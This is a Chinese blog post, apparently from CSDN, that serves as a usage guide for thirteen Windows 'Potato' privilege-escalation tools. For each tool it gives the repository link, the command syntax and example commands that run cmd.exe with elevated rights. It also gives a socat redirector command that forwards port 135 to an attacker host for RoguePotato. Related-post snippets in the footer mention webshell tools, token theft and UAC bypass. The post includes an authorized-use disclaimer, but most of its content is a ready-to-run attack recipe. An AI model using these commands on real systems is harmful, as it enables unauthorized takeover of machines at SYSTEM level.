Windows 提权工具(“Potato“ 系列)用法指南

原创 已于 2025-06-12 15:40:57 修改 · 1k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#windows #安全 #系统安全 #web安全 #网络安全

于 2025-06-12 12:20:32 首次发布

以下是13种常见的 Windows 提权工具及其基本用法。请注意,这些工具仅应用于合法授权的渗透测试或安全研究环境中。

1. BadPotato

利用 Windows 服务中的权限提升漏洞。

https://github.com/BeichenDream/BadPotato

BadPotato.exe <cmd> [args]

  • 示例

    BadPotato.exe cmd.exe /c whoami > C:\temp\whoami.txt

2. CandyPotato

通过 LSASS 进程提权,适用于域环境。

https://github.com/klezVirus/CandyPotato

CandyPotato.exe -c <command>

  • 示例

    CandyPotato.exe -c "C:\Windows\System32\cmd.exe"

3. CoercedPotato

结合 SMB 中继和 NTLM 认证进行提权。

https://github.com/Prepouce/CoercedPotato

CoercedPotato.exe -cmd <command> -target <target>

  • 示例

    CoercedPotato.exe -cmd "C:\Windows\System32\cmd.exe" -target dc01.example.com

4. EfsPotato

利用 EFS(加密文件系统)服务中的漏洞。

https://github.com/zcgonvh/EfsPotato

EfsPotato.exe -c <command>

  • 示例

    EfsPotato.exe -c "C:\Windows\System32\cmd.exe"

5. GodPotato

支持多种提权方法,功能强大。

https://github.com/BeichenDream/GodPotato

GodPotato.exe -cmd <command>

  • 示例

    GodPotato.exe -cmd "C:\Windows\System32\cmd.exe"

6. JuicyPotatoNG

JuicyPotato 的增强版本,支持更多 CLSID。

https://github.com/antonioCoco/JuicyPotatoNG

JuicyPotatoNG.exe -l <local_port> -p <program> -a <arguments> -t <trigger_type>

  • 参数说明

    • -l:本地监听端口

    • -p:要执行的程序

    • -a:传递给程序的参数

    • -t:触发类型(* 表示尝试所有)

  • 示例

    JuicyPotatoNG.exe -l 1337 -p C:\Windows\System32\cmd.exe -t *

7. PetitPotato

轻量级提权工具,适用于资源受限环境。

https://github.com/wh0amitz/PetitPotato

PetitPotato.exe <command>

  • 示例

    PetitPotato.exe "C:\Windows\System32\cmd.exe"

8. PrintNotifyPotato

利用 Print Spooler 服务漏洞。

https://github.com/BeichenDream/PrintNotifyPotato

PrintNotifyPotato.exe -i -c <command>

  • 示例

    PrintNotifyPotato.exe -i -c "C:\Windows\System32\cmd.exe"

9. RasMan

利用 RAS (Remote Access Service) 服务漏洞。

https://github.com/crisprss/RasmanPotato

RasMan.exe -c <command>

  • 示例

    RasMan.exe -c "C:\Windows\System32\cmd.exe"

10. RoguePotato

需要配合远程重定向器使用。

https://github.com/antonioCoco/RoguePotato

RoguePotato.exe -r <redirector_ip> -e <command> -l <local_port>

  • 示例

    RoguePotato.exe -r 192.168.1.100 -e "C:\Windows\System32\cmd.exe" -l 9999

11. SweetPotato

通过 DCOM 和 LSASS 进程提权。

https://github.com/CCob/SweetPotato

SweetPotato.exe -c <command>

  • 示例

    SweetPotato.exe -c "C:\Windows\System32\cmd.exe"

12.MultiPotato 提权工具用法

MultiPotato 是一个集成了多种提权技术的多功能工具,它会自动尝试不同的提权方法,直到找到一个可行的方法。这是在现代 Windows 系统上进行权限提升的有效工具。

https://github.com/S3cur3Th1sSh1t/MultiPotato

基本用法
MultiPotato.exe -c <command>
  • 参数说明
    • -c:要执行的命令或程序
    • -h:显示帮助信息
    • -v:显示详细输出
13. JuicyPotato(原版本)

经典的提权工具。

JuicyPotato.exe -l <local_port> -p <program> -a <arguments> -t <trigger_type>

  • 示例

    JuicyPotato.exe -l 1337 -p C:\Windows\System32\cmd.exe -a "/c whoami > C:\temp\whoami.txt" -t *

使用建议

  1. 准备工作

    • 确保目标系统上的防火墙允许相关通信

    • 确认目标系统的 Windows 版本和补丁状态

    • 准备好要执行的命令或程序

  2. 网络提权工具:对于需要远程协助的工具(如 RoguePotato),在攻击机上启动重定向器:

    socat tcp-listen:135,reuseaddr,fork tcp:<attacker_ip>:<local_port>

  3. 测试执行:先用简单命令测试提权是否成功:

    tool_name.exe -c "cmd /c whoami > C:\temp\whoami.txt"

  4. 替代方案:如果一种工具失败,尝试其他工具或组合使用。

  5. 合法使用:所有操作必须在获得明确授权的环境中进行。

未知鱼
关注
网安神器PotatoTool全新升级,功能更强大!
部分涉密已隐藏
12-29 1865
方案类型支持情况webshell交互流量支持网络流量包支持多种加密方式混用支持强混淆数据支持组件密文数据支持中间件等配置支持输入格式多样化支持多种Key爆破方式支持(解密不出来记得尝试更换方式及字典AI分析支持支持所有常见webshell交互流量解密Webshell管理工具支持情况冰蝎支持蚁剑支持哥斯拉支持支持Cknife支持支持网络流量包解密支持自动检测多种加密方式混用解密支持的解密方式说明支持情况AES高级加密标准支持。
工具
09-11
工具工具工具工具工具工具工具工具工具工具工具工具工具工具工具工具工具工具工具
Windows第三方
最新发布
starry_ke
07-08 1002
摘要:本文介绍了多种计算机技术,包括第三方应用(Teamviewer、浏览器密码取等)、服务启动(sc命令创建服务)、远程管理(PsTools工具)、令牌窃取(MSF/CS工具)、UAC绕过(MSF和UACME工具)、DLL劫持以及不带引号服务路径利用。这些方法可用于从普通用户升至系统限(SYSTEM),或降至域用户限。关键技术点包括进程注入、令牌模拟、钓鱼文件替换等,适用于Windows多种版本,需配合后门监听工具(如MSF)实现限维持。
工具大全
06-14
工具大全WEBSHELL入侵工具
工具对吧
12-10
补丁对比工具,用法十分的简单,使用起来也方面,systeminfo查看补天,然后copy出来,放到工具对比一下就行
.net工具
10-29
直接运行即可啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊啊
工具 pr.exe.zip
12-10
网络攻防工具 用于windows 网络攻防工具 用于windows 网络攻防工具 用于windows
PotatoTool一款功能强大的网络安全综合工具支持免杀、自定义内存马、、扫描、一键解密、AI分析、溯源等等
2202_75361164的博客
02-08 1109
PotatoTool工具是一款功能强大的网络安全综合工具,分为红队和蓝队模块。红队模块功能:信息收集、漏洞扫描、免杀、自定义内存马、命令生成、命令查询、KB查询、进程分析、信息生成、扩展模块蓝队模块功能:一键解密、专项加解密、IP信息筛选、AI分析、反编译、区块链溯源、归属地查询、文件元信息、扩展模块旨在为安全从业者、红蓝对抗人员和网络安全爱好者供全面的网络安全解决方案。红蓝对抗渗透测试流量监测流量研判流量审计CTF竞赛红队模块截图蓝队模块截图。
Small Potato-开源
04-27
9. **README**: 最后,README文件通常包含了项目的简介、安装指南、使用方法等基本信息,是初次接触Small Potato的用户需要查阅的重要文档。 总的来说,Small Potato作为一款开源象棋引擎,通过其开源特性激发了...
基于windows server的简单内网渗透
weixin_55541277的博客
06-09 3087
记录简单的基于windows server搭建的内网渗透靶场
探索汉化软件:Passolo 2007的汉化过程及使用指南
- 在使用汉化工具时,应当确保遵守软件的使用协议和版信息,尤其是对于商业软件,必须尊重原作者的版。 - 使用汉化软件之前,最好备份原软件,防止汉化过程中出现意外,导致原软件损坏或无法使用。 - 对于初学者...
常用的工具集合(含CMD)
07-01
工具集合,包括FTP,SU,CMD,3389等工具
各种工具,包括免杀版等
10-22
平时收集的19个工具,包括pr、nc、免杀等----------
windows系统工具.zip
12-25
windows7,windows2003等系统的工具,psexec.exe程序可以实现windows7和2003的,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的进程。
BadPotato:WindowsBadPotato
03-19
坏土豆 Windows 2012-2019 Windows 8-10 引用
PSTools -windows软件
11-23
PSTools -windows软件
扫描工具
qq_46258964的博客
06-23 776
1,Windows-Exploit-Suggester 使用Windows-Exploit-Suggester解析systeminfo https://github.com/AonCyberLabs/Windows-Exploit-Suggester 由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令 pip2.7 install xlrd==1.2.0 2,使用Linux-Exploit-Suggester.sh寻找linux问题 下载
辅助工具
prettyX的博客
01-10 747
0X00 内容 Windows辅助工具Windows-Exploit-Suggester介绍及使用 Linux辅助工具:Linux Exploit Suggester 2介绍及使用 漏洞集合 0X01Windows-Exploit-Suggester介绍及使用 下载:https://github.com/GDSSecurity/Windows-Exploit-Sug...
工具推荐(PEASS-ng、linpeas_linux_amd64、winPEASany_ofs)
墨痕诉清风的博客
03-21 1995
在这里,您可以找到适用于Windows、Linux/Unix*和MacOS的工具。这些工具搜索您可以利用的可能的本地升路径,并用漂亮的颜色打印给您,这样您就可以很容易地识别错误配置。查看book.hacktricks.xyz中的本地Windows升检查表WinPEAS-Windows本地升真棒脚本(C#.exe和.bat)查看book.hacktricks.xyz中的本地Linux升检查表LinPEAS-Linux本地升真棒脚本(.sh)
windows工具 烂土豆
09-17
烂土豆(Lazy Potato)是一个流行的Windows工具,它利用了Windows操作系统的一个安全漏洞来获取管理员限。这个漏洞存在于Windows服务管理器中的升合法请求的处理过程中。 烂土豆工具的原理是利用DCE/RPC协议中的NTLM身份验证漏洞,通过伪造合法的网络请求获取系统限。它的操作步骤相对简单,只需要将烂土豆工具与目标系统上运行的普通用户限程序进行交互,就能够将当前用户的升为管理员限。 然而,使用烂土豆工具进行也存在一些限制。首先,目标系统必须存在具有DCE/RPC端口开放的服务,例如Remote Procedure Call(RPC)或WinRM。其次,目标系统必须支持NTLM身份验证协议并且当前用户必须拥有执行访问的限。 尽管烂土豆工具在信息安全领域备受关注,但作为一种安全漏洞利用工具,使用它存在法律风险,并且可能导致不良后果。因此,仅在合法的渗透测试、漏洞验证或安全研究等活动中使用烂土豆工具,并遵循合法和道德准则。 总而言之,烂土豆是一种用于Windows系统升的工具,其原理是利用了DCE/RPC协议中的安全漏洞。使用该工具需要特定条件和限,并且在使用时需要遵循法律和道德规范。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值